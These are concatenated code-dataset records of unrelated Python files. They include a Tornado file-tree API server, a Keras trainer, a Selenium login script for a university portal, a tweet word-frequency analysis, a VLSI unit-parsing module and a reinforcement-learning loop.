self.json_arguments = {}\n content_type = self.request.headers.get(\"Content-Type\", \"\")\n if content_type.startswith(\"application/json\") and self.request.body:\n try:\n self.json_arguments = json_decode(self.request.body)\n except ValueError:\n message = 'Unable to parse JSON.'\n self.send_error(400, message=message) # Bad Request\n\n def get_json_argument(self, name, default):\n args = self.json_arguments\n if not args:\n if default is self._ARG_DEFAULT:\n raise tornado.web.MissingArgumentError(name)\n return default\n name = native_str(name)\n return args[name]\n\n def finish(self, chunk=None, status_code=None):\n \"\"\"Finishes this response, ending the HTTP request.\"\"\"\n if self._finished:\n raise RuntimeError(\"finish() called twice\")\n\n if chunk is None:\n chunk = {}\n\n status_code = status_code or self._status_code\n if status_code > 200:\n self.set_status(status_code)\n\n isinstance(chunk, dict) and chunk.update({\n 'code': status_code,\n 'request': \" \".join((self.request.method, self.request.path))\n })\n\n self.write(chunk)\n\n # Automatically support ETags and add the Content-Length header if\n # we have not flushed any content yet.\n if not self._headers_written:\n if (self._status_code == 200 and\n self.request.method in (\"GET\", \"HEAD\") and\n \"Etag\" not in self._headers):\n self.set_etag_header()\n if self.check_etag_header():\n self._write_buffer = []\n self.set_status(304)\n if self._status_code == 304:\n assert not self._write_buffer, \"Cannot send body with 304\"\n self._clear_headers_for_304()\n elif \"Content-Length\" not in self._headers:\n content_length = sum(len(part) for part in self._write_buffer)\n self.set_header(\"Content-Length\", content_length)\n\n if hasattr(self.request, \"connection\"):\n # Now that the request is finished, clear the callback we\n # set on the HTTPConnection (which would otherwise prevent the\n # garbage collection of the RequestHandler when there\n # are keepalive connections)\n self.request.connection.set_close_callback(None)\n\n self.flush(include_footers=True)\n self.request.finish()\n self._log()\n self._finished = True\n self.on_finish()\n # Break up a reference cycle between this handler and the\n # _ui_module closures to allow for faster GC on CPython.\n self.ui = None\n\n\n@route(r\"/api/node/([0-9]+)\", name=\"node\")\nclass NodeHandler(BaseHandler):\n\n def post(self, id):\n parent = Node.from_id(id)\n if not parent or parent.permission>0:\n self.finish(status_code=403)\n return\n\n name = self.get_json_argument('name', None)\n permission = 0\n parent_id = id\n\n # for file upload @p => permission number\n if int(self.get_query_argument('p', 0)) == 1:\n payload = self.request.files.get('file', [{}])[0]\n if not payload:\n self.finish(status_code=403)\n return\n\n name = payload['filename']\n permission = 1\n\n extension = os.path.splitext(name)[1]\n random_name = ''.join(random.choice(\n string.ascii_lowercase + string.digits) for x in xrange(6))\n file_path = os.path.join(self.settings['static_path'],\n random_name+extension)\n with open(file_path, \"wb\") as fp:\n fp.write(payload['body'])\n\n node_info = dict(\n name=name, permission=permission, parent_id=parent_id)\n node = Node.insert(**node_info)\n\n if not node:\n self.finish(status_code=403)\n return\n\n self.finish({'node': node.node_info}, status_code=201)\n\n def put(self, id):\n child_id = self.get_json_argument('nid', 0)\n child = Node.from_id(child_id)\n if child:\n node = Node.from_id(id)\n if node and node.permission is 0 and \\\n node.id is not child.parent_id:\n child.set_parent(node.id)\n self.finish({'node': node.node_info})\n return\n\n self.finish(status_code=403)\n\n def delete(self, id):\n node = Node.from_id(id)\n if not node:\n self.finish(status_code=403)\n return\n\n node.delete()\n self.finish()\n\n\n@route(r\"/api/(.*)\", name=\"node-path\")\nclass NodePathHandler(BaseHandler):\n\n def get(self, filename):\n path = filename.strip(os.sep) or None\n node = Node.from_path(path)\n nodes = []\n node_info = node.node_info if node else {}\n if node and node.permission is 0:\n nodes = node.children_from_parent_id(node.id)\n\n self.finish({'children': nodes, 'node': node_info})\n\n\nclass Node(Model):\n \"\"\"Represent a SFB node.\n \"\"\"\n\n typname = \"nodes\"\n\n def __eq__(self, other):\n if not isinstance(other, Participant):\n return False\n return self.id == other.id\n\n def __ne__(self, other):\n if not isinstance(other, Participant):\n return True\n return self.id != other.id\n\n def __repr__(self):\n return '' % repr(self.name)\n\n @classmethod\n def from_id(cls, id):\n return cls.db.one(\"\"\"\n SELECT node.*::nodes\n FROM nodes AS node\n WHERE node.id=%s\n \"\"\", (id,))\n\n # tree behavior\n\n @classmethod\n def from_path(cls, path):\n \"\"\"Find the node from given path.\n \"\"\"\n parsed_path = path.split(os.sep) if path else []\n depth = len(parsed_path)\n name = parsed_path[-1] if depth else os.sep\n\n return cls.db.one(\"\"\"\n SELECT node.*::nodes\n FROM nodes AS node\n , (SELECT node.id, (COUNT(parent.name)-1) AS depth\n FROM nodes AS node\n , nodes AS parent\n WHERE node.lft BETWEEN parent.lft AND parent.rght\n AND node.name=%(name)s\n GROUP BY node.id\n ) AS tree\n WHERE tree.id=node.id\n AND tree.depth=%(depth)s\n \"\"\", dict(name=name, depth=depth))\n\n @classmethod\n def insert(cls, **fields):\n try:\n with cls.db.get_cursor() as c:\n r = c.one(\"\"\"\n INSERT INTO nodes\n (name, permission, parent_id)\n VALUES (%(name)s, %(permission)s, %(parent_id)s)\n RETURNING nodes.*::nodes\n \"\"\", fields)\n return r\n except Exception as e:\n # Duplicated name exception raised at db procedure\n return None\n\n def delete(self):\n with self.db.get_cursor() as c:\n width = self.rght - self.lft + 1\n\n c.run(\"DELETE FROM nodes WHERE lft BETWEEN %s AND %s\",\n (self.lft, self.rght))\n c.run(\"UPDATE nodes SET rght=rght-%s WHERE rght>%s\",\n (width, self.rght))\n c.run(\"UPDATE nodes SET lft=lft-%s WHERE lft>%s\",\n (width, self.rght))\n return\n\n def set_parent(self, parent_id):\n self.db.run(\"UPDATE nodes SET parent_id=%s WHERE id=%s\",\n (parent_id, self.id))\n self.set_attributes(parent_id=parent_id)\n\n# def children_from_path(self, path):\n# \"\"\"Find the immediate subordinates of a node\n# \"\"\"\n# parsed_path = path.split(os.sep)\n# return self.db.all(\"\"\"\n# SELECT child.*\n# FROM nodes AS child\n# , nodes AS parent\n# , (SELECT child.id, (COUNT(parent.name)-1) AS depth\n# FROM nodes AS child\n# , nodes AS parent\n# WHERE child.lft BETWEEN parent.lft AND parent.rght\n# AND child.name=%(name)s\n# GROUP BY child.id\n# ) AS tree\n# WHERE tree.id=parent.id\n# AND tree.depth=%(depth)s\n# AND child.parent_id=parent.id\n# ORDER BY child.lft\n# \"\"\", dict(name=parsed_path[-1], depth=len(parsed_path)), default=[])\n\n @property\n def node_info(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'permission': self.permission,\n 'parent_id': self.parent_id,\n 'lft': self.lft,\n 'rght': self.rght\n }\n\n def children_from_parent_id(self, parent_id):\n return self.db.all(\"\"\"\n\n SELECT n.*\n FROM nodes AS n\n WHERE n.parent_id=%s\n ORDER BY n.lft ASC\n \"\"\", (parent_id,), back_as=dict)\n\n\ndef main():\n \"\"\"Start SFB server.\n \"\"\"\n tornado.options.parse_command_line()\n http_server = tornado.httpserver.HTTPServer(Application(options.debug),\n xheaders=True)\n http_server.listen(options.port)\n try:\n logging.info(\"SFB server [%s] start..\" % (options.port,))\n tornado.ioloop.IOLoop.current().start()\n except KeyboardInterrupt:\n logging.warn(\"SFB server [%s] interrupted.\" % (options.port,))\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":11276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"496784578","text":"import os\nimport numpy as np\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.metrics import Precision, Recall\nfrom datetime import datetime as dt\nfrom pytz import timezone\nfrom tqdm.auto import tqdm\nfrom functools import cmp_to_key\nimport pandas as pd\nfrom sklearn.metrics import confusion_matrix\n\nfrom module.data_loader import DataLoader\n\n\npd.set_option('display.max_columns', None)\npd.set_option('display.width', 200)\n\n\ndef calc_f1score(precision, recall):\n return 2 * precision * recall / (precision + recall + 1e-7)\n\n\nclass ModelMetric:\n def __init__(self, epoch, loss, accuracy, precision, recall, checkpoint=None):\n self.epoch = epoch\n self.loss = loss\n self.accuracy = accuracy\n self.precision = precision\n self.recall = recall\n self.f1score = calc_f1score(precision, recall)\n self.checkpoint = checkpoint\n\n @staticmethod\n def compare(a, b):\n \"\"\" f1score, accuracy, loss를 각각 1, 2, 3순위로 하여 비교.\n a의 metric이 b의 것보다 더 좋으면 1, 같으면 0, 나쁘면 -1을 반환 \"\"\"\n if a.f1score > b.f1score:\n return 1\n elif a.f1score == b.f1score:\n if a.accuracy > b.accuracy:\n return 1\n elif a.accuracy == b.accuracy:\n if a.loss < b.loss:\n return 1\n elif a.loss == b.loss:\n return 0\n return -1\n\n\nclass Trainer:\n def __init__(self, model: Model, data_loader: DataLoader, ckpt_dir):\n self.model = model\n self.data_loader = data_loader\n self.ckpt_dir = ckpt_dir\n\n if not os.path.exists(ckpt_dir):\n os.makedirs(ckpt_dir)\n\n def test(self, batch_size):\n self.model.reset_metrics()\n\n # progress bar와 metric 표시를 위한 tqdm 생성\n batch_generator = self.data_loader.iter_test_batch_data(batch_size)\n batch_count = self.data_loader.get_test_batch_count(batch_size)\n description = f'Test'\n with tqdm(batch_generator, total=batch_count, desc=description) as pbar:\n # batch 수만큼 반복\n for x, y in pbar:\n loss, accuracy, precision, recall = self.model.test_on_batch(x, y, reset_metrics=False)\n f1score = calc_f1score(precision, recall)\n\n # print metrics\n metric_str = f'loss: {loss:.4f}, accuracy: {accuracy:.4f}, precision: {precision:.4f}, recall: {recall:.4f}, f1score: {f1score:.4f}'\n pbar.set_postfix_str(metric_str)\n\n return loss, accuracy, precision, recall, f1score\n\n def test_prediction(self, batch_size):\n y_pred_list = []\n\n batch_generator = self.data_loader.iter_test_batch_data(batch_size)\n batch_count = self.data_loader.get_test_batch_count(batch_size)\n description = f'Test'\n with tqdm(batch_generator, total=batch_count, desc=description) as pbar:\n # batch 수만큼 반복\n for x in pbar:\n pred = self.model.predict_on_batch(x)\n pred = pred if isinstance(pred, np.ndarray) else pred.numpy()\n y_pred = (pred > 0.5) * 1\n y_pred_list.append(y_pred.squeeze())\n return np.hstack(y_pred_list)\n\n def predict(self, batch_size):\n y_pred_list = []\n for x, _ in self.data_loader.iter_test_batch_data(batch_size):\n pred = self.model.predict_on_batch(x)\n pred = pred.numpy() if not isinstance(pred, np.ndarray) else pred\n y_pred = (pred > 0.5) * 1\n\n y_pred_list.append(y_pred.squeeze())\n\n return np.concatenate(y_pred_list)\n","sub_path":"test/module/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"305322700","text":"import argparse\nimport os\n\nfrom jooble_transformer.transformer import Transformer\n\n\nparser = argparse.ArgumentParser(\n description='Transforms `train` and `test` tsvs.'\n ' See repo README for details on how to run from docker')\nparser.add_argument('--data-path', default='/tmp/jooble_test_task_data')\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n Transformer(data_path=args.data_path).transform()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"405959066","text":"import os\nimport csv\n\n\n\n\ndef create_indexable(chrom, fle):\n\tchromdata = list(csv.reader(open('/home/vdp5/data/gene_finder/vir_bychrom_ASM241v2/{}/{}'.format(chrom, fle)),delimiter='\\t'))\n\tstringineed = chromdata[-1][0]\n\treturn stringineed\n\n\nexitfle = open('/home/vdp5/data/cdna_analysis_ASM241_v2/gene2exon_ASM241_v2.txt', 'w')\nrootdir = '/home/vdp5/data/cdna_analysis_ASM241_v2/vir_genes'\nflag_file = open('/home/vdp5/data/cdna_analysis_ASM241_v2/flagged_genes.txt', 'w')\n\ngene2exons = {}\n\nfor subdir, dirs, files in os.walk(rootdir):\n\tsortedfles = sorted(files)\n\tif len(sortedfles)!=2:\n\t\tcontinue\n\ttmp = list(csv.reader(open(os.path.join(subdir, sortedfles[0])),delimiter='\\t'))\n\tholder = sortedfles[0][:-7].split('_')[-2:]\n\tchrom_file_search = '_'.join(holder)\n\tfastaname = sortedfles[0][:-7] + '.fasta'\n\tchrombyindex = create_indexable(chrom_file_search, fastaname)\n\tgene='_'.join(sortedfles[0].split('_')[:2])\n\texonnums = []\n\ttmplst = []\n\tfor alpha in tmp:\n\t\tif len(alpha) == 0: continue\n\t\tif 'Exon' in alpha[0]:\n\t\t\tdata = alpha[0].split(' ')\n\t\t\tif float(data[-1]) < 0.95:\n\t\t\t\tcontinue\n\t\t\tindices = [int(a) for a in data[3].split('(')[-1].split(',')[0].split('-')]\n\t\t\ttmplst.append('>{}_exon{}\\n{}'.format(gene, data[2], chrombyindex[indices[0]-1:indices[1]]))\n\n\t\t\texonnums.append(int(data[2]))\n\ttmplst = sorted(tmplst)\n\tif len(tmplst) != len(list(set(exonnums))):\n\t\tflag_file.write('{}\\n'.format(gene))\n\t\tcontinue\n\texitfle.write('\\n'.join(tmplst) + '\\n')\n\n\nexitfle.close()\nflag_file.close()\n","sub_path":"predrake_scripts/create_exonic_directory_ASM241_v2.py","file_name":"create_exonic_directory_ASM241_v2.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"180861408","text":"# Scrape SIS for Major Requirements\n# I don't like Ruby\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport logging\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\n\nURL=\"https://sisuva.admin.virginia.edu/psp/ihprd/EMPLOYEE/EMPL/h/?tab=PAPP_GUEST\"\nHEADERS = {'user-agent' : 'Chrome/51.0.2 (Macintosh; Intel Mac OS X 10.11.5); FUCKSIS123/wastingmytime@email.com'}\n\ndef search_ps(driver, query):\n\tpage_source = driver.page_source.encode('utf-8')\n\treturn query in page_source\n\nlogging.basicConfig(filename='log.out',level=logging.DEBUG)\t\nlogging.debug(\"opening browser\")\ndriver = webdriver.Chrome('/Users/cood/code/chromedriver')\ndriver.get(URL)\n\nlogging.debug(\"wait for login button to be displayed\")\nwait = WebDriverWait(driver, 10)\nwait.until(EC.element_to_be_clickable((By.NAME,'Netbadge')))\nlogging.debug(\"click on login button\")\ndriver.find_element_by_name('Netbadge').click()\n\nlogging.debug(\"logging in\")\nwith open('credentials', 'r') as f:\n\tcreds = f.read()\n\tusername,password = creds.split(':')\n\ndriver.find_element_by_name(\"user\").send_keys(username)\ndriver.find_element_by_name(\"pass\").send_keys(password)\n\nlogging.debug(\"waiting for iframe\")\nwait.until(EC.frame_to_be_available_and_switch_to_it((By.TAG_NAME, \"iframe\")))\n\nlogging.debug(\"select what-if report from dropdown\")\nwait.until(EC.presence_of_all_elements_located((By.NAME, \"DERIVED_SSS_SCL_SSS_MORE_ACADEMICS\")))\ndriver.find_element_by_name(\"DERIVED_SSS_SCL_SSS_MORE_ACADEMICS\").send_keys('w')\ndriver.execute_script(\"javascript:submitAction_win0(document.win0,'DERIVED_SSS_SCL_SSS_GO_1');\")\n\nlogging.debug(\"waiting for next page to load\")\n# Ruby will switch back to default content on new page load. interesting...\ndriver.switch_to_default_content()\nframe = driver.find_element_by_tag_name(\"iframe\")\ndriver.switch_to_frame(frame)\n'''\niframes = driver.find_elements_by_tag_name('iframe')\nfor f in iframes:\n\tprint('in loop')\n\tprint(f.get_attribute('outerHTML'))\n\tprint(\"\\n\\n\\n\\n\")\n'''\n#wait.until(driver.find_element_by_name(\"DERIVED_SAAWHIF_SSS_CREATE_NEW\").is_displayed)\n#driver.find_element_by_name(\"DERIVED_SAAWHIF_SSS_CREATE_NEW\").click\nprint(driver.page_source.encode('utf-8'))\n\n\n\n\n\n\t\n","sub_path":"sis.py","file_name":"sis.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"580527887","text":"\"\"\"empty message\n\nRevision ID: 4eae7061c50c\nRevises: 2ea0c270256a\nCreate Date: 2016-01-28 14:41:02.229555\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '4eae7061c50c'\ndown_revision = '2ea0c270256a'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('category', sa.Column('view_count', sa.Integer(), nullable=True))\n op.add_column('service', sa.Column('view_count', sa.Integer(), nullable=True))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('service', 'view_count')\n op.drop_column('category', 'view_count')\n ### end Alembic commands ###\n","sub_path":"server/migrations/versions/4eae7061c50c_.py","file_name":"4eae7061c50c_.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"306873202","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pandas as pd\nfrom collections import Counter\nimport re\nimport numpy as np\nimport nltk\nfrom nltk.stem.snowball import SnowballStemmer\nfrom nltk.corpus import stopwords\nstemming = SnowballStemmer(\"spanish\")\nstops = set(stopwords.words('spanish'))\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nimport matplotlib.pyplot as plt\nimport seaborn as sn\n\n################################################# Definiciones #####################################################\ndef rowse(DataFrame):\n\treturn DataFrame.iloc[0:10048, 0]\ndef rowst(DataFrame):\n\treturn DataFrame.iloc[0:10048, 1]\n\ndef apply_cleaning_function_to_list(X):\n\tcleaned_X = []\n\tfor x in X:\n\t\tcleaned_X.append(clean_text(x))\n\treturn cleaned_X\ndef clean_text(raw_text):\n\ttext = raw_text.lower()\n\ttokens = nltk.word_tokenize(text)\n\ttoken_words = [w for w in tokens if w.isalpha()]\n\tpunct = [re.sub(r'[^\\w\\s]', '', w) for w in token_words if not w in stops]\n\t#stemmed_words = [stemming.stem(w) for w in punct]\n\t#meaningful_words = [w for w in stemmed_words if not w in stops]\n\t#joined_words = (' '.join(meaningful_words))\n\tjoined_words = (' '.join(punct))\n\treturn joined_words\n\ndef percent(x):\n\ty = ((x)*100)/10048\n\treturn float(\"{0:.2f}\".format(y))\n\n#################################################################################################################\n\nif __name__ == \"__main__\":\n\n\ttext1 = pd.read_csv('alegria_claudia_terminado.csv', names = ['Etiqueta1', 'Tweet1'])\n\ttext1['Tweet1'] = text1['Tweet1'].replace('http\\S+', '', regex=True).replace(r'www\\S+', '', regex=True)\n\n\ttext2 = pd.read_csv('alegria_tona_terminado.csv', names = ['Etiqueta2', 'Tweet2'])\n\ttext2['Tweet2'] = text2['Tweet2'].replace('http\\S+', '', regex=True).replace(r'www\\S+', '', regex=True)\n\n\ttext3 = pd.read_csv('alegria_iris.csv', names = ['Etiqueta3', 'Tweet3'])\n\ttext3['Tweet3'] = text3['Tweet3'].replace('http\\S+', '', regex=True).replace(r'www\\S+', '', regex=True)\n\n\ttweets = pd.concat([rowst(text1), rowst(text2), rowst(text3)])\n\n\tetiquetas = pd.concat([rowse(text1), rowse(text2), rowse(text3)])\n\tetiquetas = etiquetas.replace(' N', 'N')\n\tetiquetas = etiquetas.replace('N ', 'N')\n\tetiquetas = etiquetas.replace('X', 'C')\n\tetiquetas = etiquetas.replace('V', 'C')\n\tetiquetas = etiquetas.replace('S', 'A')\n\tetiquetas = etiquetas.replace('D', 'A')\n\tetiquetas = etiquetas.replace('O', 'P')\n\tetiquetas = etiquetas.replace(' F', 'F')\n\tetiquetas = etiquetas.replace('C ', 'C')\n\tetiquetas = etiquetas.replace('Á', 'A')\n\n\tdata = pd.DataFrame({'et1': rowse(text1), 'et2': rowse(text2),\n\t\t'et3': rowse(text3) , 'twits': rowst(text1)})\n\tdata['et1'] = np.where(data['et1'] == 'Á', 'A', data['et1'])\n\tdata['et2'] = np.where(data['et2'] == 'X', 'C', data['et2'])\n\tdata['et2'] = np.where(data['et2'] == 'V', 'C', data['et2'])\n\tdata['et2'] = np.where(data['et2'] == 'S', 'A', data['et2'])\n\tdata['et2'] = np.where(data['et2'] == 'D', 'A', data['et2'])\n\tdata['et2'] = np.where(data['et2'] == ' N', 'N', data['et2'])\n\tdata['et3'] = np.where(data['et3'] == 'N ', 'N', data['et3'])\n\tdata['et3'] = np.where(data['et3'] == 'O', 'P', data['et3'])\n\tdata['et3'] = np.where(data['et3'] == ' F', 'F', data['et3'])\n\tdata['et3'] = np.where(data['et3'] == 'C ', 'C', data['et3'])\n\tdata['et3'] = np.where(data['et3'] == 'V', 'C', data['et3'])\n\n\tet1 = list(enumerate(data['et1']))\n\tet2 = list(enumerate(data['et2']))\n\tet3 = list(enumerate(data['et3']))\n\n\tatl2 = set(et1).intersection(et2).union(set(et1).intersection(et3)).union(set(et2).intersection(et3))\n\tex3 = set(et1).intersection(et2).intersection(set(et1).intersection(et3))\n\n\tunion = list(sorted(atl2.union(ex3)))\n\n\tindex = [x for x,y in et1]\n\tiunion = [x for x,y in union]\n\teunion = [y for x,y in union]\n\n\tetiq = pd.Series(eunion, index=iunion)\n\tdata['match'] = etiq.reindex()\n\tdata = data.fillna('NA')\n\n\n\t############################################################# CANTIDAD DE TUITS Y PORCENTAJES ############################################################################\n\n\tcant = list(data.groupby('match').twits.count().values)\n\tcateg = sorted(list(data.match.unique()))\n\tpercents = [percent(x) for x in cant]\n\t\n\tinfo = pd.DataFrame(data.groupby('match').twits.count())\n\tinfo['percent'] = percents\n\t\n\t#for x,y,z in zip(categ,cant,percents):\n\t\t#print('Categoría: {} cantidad de tuits: {} porcentaje: {}%'.format(x,y,z))\n\n\t############ Gráfica de barras\n\tfig = plt.figure(figsize=(8,6))\n\tbar = data.groupby('match').twits.count().plot.bar (ylim=0)\n\tplt.xlabel('Categorías') \n\tplt.ylabel('Cantidad de tuits')\n\tplt.grid(alpha=.5, linestyle='--')\n\tplt.show()\n\n\n\t########################################################### FRECUENCIA DE PALABRA EN CADA CATEGORÍA ######################################################################\n\n\ttext_to_clean = list(data['twits'])\n\tcleaned_text = apply_cleaning_function_to_list(text_to_clean)\n\tdata['cleaned'] = cleaned_text\n\tnew_data = pd.DataFrame({'text': data.cleaned, 'target': data.match})\n\tnew_data = new_data[new_data.target != 'NA'] \t#Se eliminan los que quedaron sin categoría\n\t#print(new_data)\n\n\tclasA = new_data[new_data.target == 'A']\n\tclasP = new_data[new_data.target == 'P']\n\tclasF = new_data[new_data.target == 'F']\n\tclasC = new_data[new_data.target == 'C']\n\tclasN = new_data[new_data.target == 'N']\n\t#print(new_data)\n\n\tcvec = CountVectorizer(analyzer = 'word')\n\tcvec.fit(new_data.text)\n\n\tclasA_matrix = cvec.transform(clasA.text)\n\tclasP_matrix = cvec.transform(clasP.text)\n\tclasF_matrix = cvec.transform(clasF.text)\n\tclasC_matrix = cvec.transform(clasC.text)\n\tclasN_matrix = cvec.transform(clasN.text)\n\n\tA_tf = np.sum(clasA_matrix,axis=0)\n\tP_tf = np.sum(clasP_matrix,axis=0)\n\tF_tf = np.sum(clasF_matrix,axis=0)\n\tC_tf = np.sum(clasC_matrix,axis=0)\n\tN_tf = np.sum(clasN_matrix,axis=0)\n\t\n\tcA = np.squeeze(np.asarray(A_tf))\n\tcP = np.squeeze(np.asarray(P_tf))\n\tcF = np.squeeze(np.asarray(F_tf))\n\tcC = np.squeeze(np.asarray(C_tf))\n\tcN = np.squeeze(np.asarray(N_tf))\n\t\n\tterm_freq_df = pd.DataFrame([cA,cP,cF,cC,cN],\n\t\tcolumns=cvec.get_feature_names()).transpose()\n\tterm_freq_df.columns = ['A','P','F','C','N']\n\tterm_freq_df['total'] = (term_freq_df['A'] + term_freq_df['P'] + term_freq_df['F']\n\t\t+ term_freq_df['C'] + term_freq_df['N'])\n\t#print(term_freq_df.sort_values(by='total', ascending=False))\n\t\n\n\t################# Frecuencia relativa\n\tfrec_rel = pd.DataFrame()\n\tfrec_rel['A'] = term_freq_df['A'].apply(lambda x: (x/40351)*100)\n\tfrec_rel['P'] = term_freq_df['P'].apply(lambda x: (x/8654)*100)\n\tfrec_rel['F'] = term_freq_df['F'].apply(lambda x: (x/4332)*100)\n\tfrec_rel['C'] = term_freq_df['C'].apply(lambda x: (x/21151)*100)\n\tfrec_rel['N'] = term_freq_df['N'].apply(lambda x: (x/9279)*100)\n\tfrec_rel['total'] = term_freq_df['total'].apply(lambda x: (x/97095)*100)\n\t#print(frec_rel.sort_values(by='total', ascending=False).head(20))\n\n\n","sub_path":"Frecuencias Relativas.py","file_name":"Frecuencias Relativas.py","file_ext":"py","file_size_in_byte":6899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"566728746","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# units.py\n# Unit classes/functions for hammer_vlsi.\n#\n# Copyright 2018 Edward Wang \n\nfrom abc import ABC, abstractmethod\n\n\nclass ValueWithUnit(ABC):\n \"\"\"Represents some particular value that has units (e.g. \"10 ns\", \"2000 um\", \"25 C\", etc).\n \"\"\"\n\n # From https://stackoverflow.com/a/10970888\n _prefix_table = {\n 'y': 1e-24, # yocto\n 'z': 1e-21, # zepto\n 'a': 1e-18, # atto\n 'f': 1e-15, # femto\n 'p': 1e-12, # pico\n 'n': 1e-9, # nano\n 'u': 1e-6, # micro\n 'm': 1e-3, # mili\n 'c': 1e-2, # centi\n 'd': 1e-1, # deci\n '': 1, # \n 'k': 1e3, # kilo\n 'M': 1e6, # mega\n 'G': 1e9, # giga\n 'T': 1e12, # tera\n 'P': 1e15, # peta\n 'E': 1e18, # exa\n 'Z': 1e21, # zetta\n 'Y': 1e24, # yotta\n }\n\n @property\n @abstractmethod\n def unit(self) -> str:\n \"\"\"Get the base unit for values (e.g. \"s\", \"m\", \"V\", etc).\n Meant to be overridden by subclasses.\"\"\"\n\n @property\n @abstractmethod\n def unit_type(self) -> str:\n \"\"\"Get the base unit type for values. (e.g. for \"s\", this would be \"time\")\n Meant to be overridden by subclasses.\"\"\"\n\n def __init__(self, value: str, default_prefix: str = 'n') -> None:\n \"\"\"Create a time value from parsing the given string.\n Default prefix: n- (e.g. \"ns\", \"nV\", etc)\n \"\"\"\n import re\n\n regex = r\"^([\\d.]+) *(.*){}$\".format(re.escape(self.unit))\n m = re.search(regex, value)\n if m is None:\n try:\n num = str(float(value))\n prefix = default_prefix\n except ValueError:\n raise ValueError(\"Malformed {type} value {value}\".format(type=self.unit_type, value=value))\n else:\n num = m.group(1)\n prefix = m.group(2)\n\n if num.count('.') > 1 or len(prefix) > 1:\n raise ValueError(\"Malformed {type} value {value}\".format(type=self.unit_type, value=value))\n\n if prefix not in self._prefix_table:\n raise ValueError(\"Bad prefix for {value}\".format(value=value))\n\n self._value = float(num) # type: float\n # Preserve the prefix too to preserve precision\n self._prefix = self._prefix_table[prefix] # type: float\n\n @property\n def value(self) -> float:\n \"\"\"Get the actual value of this value. (e.g. 10 ns -> 1e-9)\"\"\"\n return self._value * self._prefix\n\n def value_in_units(self, prefix: str, round_zeroes: bool = True) -> float:\n \"\"\"Get this value in the given prefix. e.g. \"ns\", \"mV\", etc.\n \"\"\"\n # e.g. extract \"n\" from \"ns\" or blank if it's blank (e.g. \"V\" -> \"\")\n letter_prefix = \"\"\n if prefix != self.unit:\n letter_prefix = \"\" if prefix == \"\" else prefix[0]\n\n retval = self._value * (self._prefix / self._prefix_table[letter_prefix])\n if round_zeroes:\n return round(retval, 2)\n else:\n return retval\n\n def str_value_in_units(self, prefix: str, round_zeroes: bool = True) -> str:\n \"\"\"Get this value in the given prefix but including the units.\n e.g. return \"5 ns\".\n\n :param prefix: Prefix for the resulting value - e.g. \"ns\".\n :param round_zeroes: True to round 1.00000001 etc to 1 within 2 decimal places.\n \"\"\"\n # %g removes trailing zeroes\n return \"%g\" % (self.value_in_units(prefix, round_zeroes)) + \" \" + prefix\n\n\nclass TimeValue(ValueWithUnit):\n \"\"\"Time value - e.g. \"4 ns\".\n Parses time values from strings.\n \"\"\"\n\n @property\n def unit(self) -> str:\n return \"s\"\n\n @property\n def unit_type(self) -> str:\n return \"time\"\n\n\nclass VoltageValue(ValueWithUnit):\n \"\"\"Voltage value - e.g. \"0.95 V\", \"950 mV\".\n \"\"\"\n\n @property\n def unit(self) -> str:\n return \"V\"\n\n @property\n def unit_type(self) -> str:\n return \"voltage\"\n\n\nclass TemperatureValue(ValueWithUnit):\n \"\"\"Temperature value in Celsius - e.g. \"25 C\", \"125 C\".\n Mainly used for specifying corners for MMMC.\n \"\"\"\n\n @property\n def unit(self) -> str:\n return \"C\"\n\n @property\n def unit_type(self) -> str:\n return \"voltage\"\n","sub_path":"src/hammer-vlsi/hammer_vlsi/units.py","file_name":"units.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"91445887","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nfrom env import Env\nfrom Brain import NoisyQ\nimport numpy as np\nimport tensorflow as tf \nimport copy\n\n\ndef update():\n for episode in range(300):\n # initial observation\n s = 0\n E = Env()\n while True:\n # RL choose action based on observation\n action = RL.choose_action(s)\n # RL take action and get next observation and reward\n s_, reward, done = E.step(action)\n print(action, reward)\n # RL learn from this transition\n RL.learn(s, action, reward, s_)\n # swap observation\n s = s_\n # break while loop when end of this episode\n if done:\n #RL.epsilon += 0.001\n break\n if episode %10 == 0:\n RL.dump_model = copy.copy(RL.model)\n \n \n E = Env()\n print(\"---------------test---------------\")\n RL.m.bias_noisy = False\n RL.m.weight_noisy = False\n for i in range(E.final_step):\n q_table = RL.model.predict([i])\n E.step(np.argmax(q_table))\n print(np.argmax(q_table))\n 